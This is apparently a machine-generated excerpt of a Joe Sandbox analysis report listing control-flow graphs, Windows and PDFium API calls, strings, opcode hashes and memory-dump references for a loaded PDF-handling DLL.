                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFormatLastMessage___from_strstr_to_strchr_strlen
                                                                                                        • String ID: $%s (0x%x)$Error (0x%x) while retrieving error. (0x%x)
                                                                                                        • API String ID: 335798620-593883576
                                                                                                        • Opcode ID: 2a7134081f4e1908799e151c96940a16f4911c87373615ac04992504d992aebc
                                                                                                        • Instruction ID: 881c5f4b4e4e2eccc5f69505b798e0c3fd113ffc26a9804999cd0374b89366f6
                                                                                                        • Opcode Fuzzy Hash: 2a7134081f4e1908799e151c96940a16f4911c87373615ac04992504d992aebc
                                                                                                        • Instruction Fuzzy Hash: CD51EEB1D187C595E3318B1488867FBF7E4BBEE324F201B1EE9D885951EBF442848782

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1482 6cd38c2a-6cd38c67 GetModuleHandleExW 1483 6cd38c8a-6cd38c8e 1482->1483 1484 6cd38c69-6cd38c7b GetProcAddress 1482->1484 1486 6cd38c90-6cd38c93 FreeLibrary 1483->1486 1487 6cd38c99-6cd38ca6 1483->1487 1484->1483 1485 6cd38c7d-6cd38c88 1484->1485 1485->1483 1486->1487
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0782F61A,6CBF37B1,?,00000000,6CD5939C,000000FF,?,6CD38CEB,6CBF37B1,?,6CD38D87,6CBF37B1), ref: 6CD38C5F
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD38C71
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,6CD5939C,000000FF,?,6CD38CEB,6CBF37B1,?,6CD38D87,6CBF37B1), ref: 6CD38C93
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 9c791107532ac9f105c21b721d2b0f7425f46213bd2cfc745ebd0f197912f2ac
                                                                                                        • Instruction ID: 2117443847690b7799f7e28748f40931730a26ef0e2e4ad48b450ef4e0228cdc
                                                                                                        • Opcode Fuzzy Hash: 9c791107532ac9f105c21b721d2b0f7425f46213bd2cfc745ebd0f197912f2ac
                                                                                                        • Instruction Fuzzy Hash: A0016271A15665EFDF118F90CC04FAEB7B8FB45715F140626F825E2A90DB799900CA90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1640 6cbf0310-6cbf0328 1641 6cbf038c-6cbf039d call 6cd2b4d8 1640->1641 1642 6cbf032a-6cbf0333 1640->1642 1642->1641 1643 6cbf0335-6cbf034d lstrlenA GetStdHandle 1642->1643 1645 6cbf0350-6cbf0352 1643->1645 1647 6cbf037b-6cbf0383 1645->1647 1648 6cbf0354-6cbf0370 WriteFile 1645->1648 1647->1641 1650 6cbf0385-6cbf038a 1647->1650 1648->1647 1649 6cbf0372-6cbf0379 1648->1649 1649->1645 1649->1647 1650->1641 1651 6cbf039e-6cbf03ad GetStdHandle 1650->1651 1652 6cbf03b0-6cbf03b6 1651->1652 1652->1641 1653 6cbf03b8-6cbf03d4 WriteFile 1652->1653 1653->1641 1654 6cbf03d6-6cbf03dd 1653->1654 1654->1652 1655 6cbf03df 1654->1655 1655->1641
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?), ref: 6CBF0336
                                                                                                        • GetStdHandle.KERNEL32(000000F4), ref: 6CBF0340
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 6CBF0368
                                                                                                        • GetStdHandle.KERNEL32(000000F4), ref: 6CBF03A5
                                                                                                        • WriteFile.KERNEL32(00000000,6CD7E540,6CD7E541,?,00000000), ref: 6CBF03CC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleWrite$lstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1181780142-0
                                                                                                        • Opcode ID: 76ebe13b8d4e6239688ebcd4be390a41d7d995fa3b2d1b119fe7c9f341ef1b80
                                                                                                        • Instruction ID: 0a5b727599a94c89ae4324de672b72669af6dc1f1aef0636cd01e75658d4d096
                                                                                                        • Opcode Fuzzy Hash: 76ebe13b8d4e6239688ebcd4be390a41d7d995fa3b2d1b119fe7c9f341ef1b80
                                                                                                        • Instruction Fuzzy Hash: DC219571B1828A5FEB10CB69DCC4BBF77B8EB05358F540114E82597790E774990986A2

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 6CBF0FD0: _strlen.LIBCMT ref: 6CBF0FDD
                                                                                                          • Part of subcall function 6CBF0FD0: ___from_strstr_to_strchr.LIBCMT ref: 6CBF0FF9
                                                                                                        • _strlen.LIBCMT ref: 6CBEFE1E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strlen$___from_strstr_to_strchr
                                                                                                        • String ID: )] $UNKNOWN$VERBOSE
                                                                                                        • API String ID: 3974054854-3915483136
                                                                                                        • Opcode ID: cf8420bdca2efa4e9f42d2806392489250ef975558879da39cb6c584873d54f9
                                                                                                        • Instruction ID: 2dae40c5c6fa7a501d7362a23001742b7861a1d285e47e3cf672ef87f2ebd883
                                                                                                        • Opcode Fuzzy Hash: cf8420bdca2efa4e9f42d2806392489250ef975558879da39cb6c584873d54f9
                                                                                                        • Instruction Fuzzy Hash: D611B6717001C86BEF115B71AD90DEF7796EBC1658B048929E8258BB60EFB09D0E87E1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1726 6cbf21e0-6cbf220a VirtualFree 1727 6cbf220c-6cbf2214 GetLastError 1726->1727 1728 6cbf2240-6cbf2252 call 6cd2b4d8 1726->1728 1727->1728 1730 6cbf2216-6cbf223b call 6cbefc80 call 6cbefcd0 call 6cbefce0 1727->1730 1730->1728
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(?,?,00004000), ref: 6CBF2202
                                                                                                        • GetLastError.KERNEL32 ref: 6CBF220C
                                                                                                        Strings
                                                                                                        • ..\base\allocator\partition_allocator\page_allocator_internals_win.h, xrefs: 6CBF2228
                                                                                                        • static_cast<uint32_t>(0L) == GetLastError(), xrefs: 6CBF221E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFreeLastVirtual
                                                                                                        • String ID: ..\base\allocator\partition_allocator\page_allocator_internals_win.h$static_cast<uint32_t>(0L) == GetLastError()
                                                                                                        • API String ID: 499627090-2617910450
                                                                                                        • Opcode ID: b5247e443cbfeaee9f8cb1d86de1eee49d37efa1ec7e77836ca761dc4854c550
                                                                                                        • Instruction ID: f7562879aa2b26149b3fae45421786d0769d4f87469403d62e6679e2762e5218
                                                                                                        • Opcode Fuzzy Hash: b5247e443cbfeaee9f8cb1d86de1eee49d37efa1ec7e77836ca761dc4854c550
                                                                                                        • Instruction Fuzzy Hash: F8F02B30B0024427EF049B61D855BEE3775EF89B98F004018ED195B780CB34AA09C6D5
                                                                                                        APIs
                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,6CD2B53C,00000064), ref: 6CD2B5FA
                                                                                                        • LeaveCriticalSection.KERNEL32(6CF3B680,?,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B604
                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B615
                                                                                                        • EnterCriticalSection.KERNEL32(6CF3B680,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B61C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3269011525-0
                                                                                                        • Opcode ID: 9c5b85b1b78897e7e00a423e311135b34f227cb049d12ed17c7de2f0a72357f7
                                                                                                        • Instruction ID: 591b029966add3cbb20ad40fa62a5d92989d1d6e5b172aae4af82cea2a37efd1
                                                                                                        • Opcode Fuzzy Hash: 9c5b85b1b78897e7e00a423e311135b34f227cb049d12ed17c7de2f0a72357f7
                                                                                                        • Instruction Fuzzy Hash: BAE09231B21938FBCF611F91CC29F9D3F36FB06751B051980F94D66511CB6958109BD8
                                                                                                        APIs
                                                                                                        • FPDFPageObj_GetType.IEPDF32(?), ref: 6CBD248D
                                                                                                        • FPDFPageObj_GetType.IEPDF32(?,?,?), ref: 6CBD263A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Obj_PageType
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1809354570-3862875103
                                                                                                        • Opcode ID: d150a150c4168c7299fd861a39154d0a76ac76e727c5d64d8502b260d46ab1ca
                                                                                                        • Instruction ID: a1957f6c34e14ceed69eaca6ada472df97cdc2426c9d8cd598bcc9446358a0c0
                                                                                                        • Opcode Fuzzy Hash: d150a150c4168c7299fd861a39154d0a76ac76e727c5d64d8502b260d46ab1ca
                                                                                                        • Instruction Fuzzy Hash: 4351C435B112998FDF10CF68C994AAE7BB5FF48708B110069E91A9B741DB31FD05CBA2
                                                                                                        APIs
                                                                                                        • FPDFAnnot_GetSubtype.IEPDF32(?), ref: 6CBCC6A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Annot_Subtype
                                                                                                        • String ID: Highlight$Subtype
                                                                                                        • API String ID: 2863784842-3181136990
                                                                                                        • Opcode ID: 141b6d4cda3139464e8d62ca94a406d563499cd022a250994b97acc1061fb0cf
                                                                                                        • Instruction ID: 2f8b63a49410f8b03285d1c556fc17bb8bbd5d8167c70fbc3ddd6383bed3206b
                                                                                                        • Opcode Fuzzy Hash: 141b6d4cda3139464e8d62ca94a406d563499cd022a250994b97acc1061fb0cf
                                                                                                        • Instruction Fuzzy Hash: DD212772F0011D9FEB149E758880A7B7369EFA8618F110929DA295FB90E730E806C7D3
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
